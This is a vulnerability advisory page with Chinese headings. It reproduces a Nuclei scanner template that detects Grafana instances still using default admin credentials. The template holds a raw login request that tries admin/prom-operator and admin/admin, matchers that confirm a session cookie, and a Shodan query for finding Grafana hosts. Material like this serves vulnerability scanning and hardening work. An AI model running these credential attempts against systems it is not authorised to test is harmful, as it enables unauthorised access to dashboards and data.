漏洞描述
Grafana default admin login credentials were detected.
grafana-default-login: Grafana Default Login
PoC代码[已公开]
id: grafana-default-login
info:
name: Grafana Default Login
author: pdteam
severity: high
description: Grafana default admin login credentials were detected.
reference:
- https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: title:"Grafana"
product: grafana
vendor: grafana
tags: grafana,default-login,vuln
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
{"user":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- admin
- admin
password:
- prom-operator
- admin
matchers-condition: and
matchers:
- type: word
words:
- "grafana_session" # Login cookie
part: header
- type: word
part: body
words:
- "Logged in" # Logged in keyword
- type: status
status:
- 200
# digest: 490a00463044022014c874a60b3ef240fe9880b2bf53d7a9578a27f293c974e9cdec89673aa0e5af02204feb1f3c604d47aef55c26b304fe4e9fd8c514463c49957f57b275f1abbdceff:922c64590222798bb761d5b6d8e72950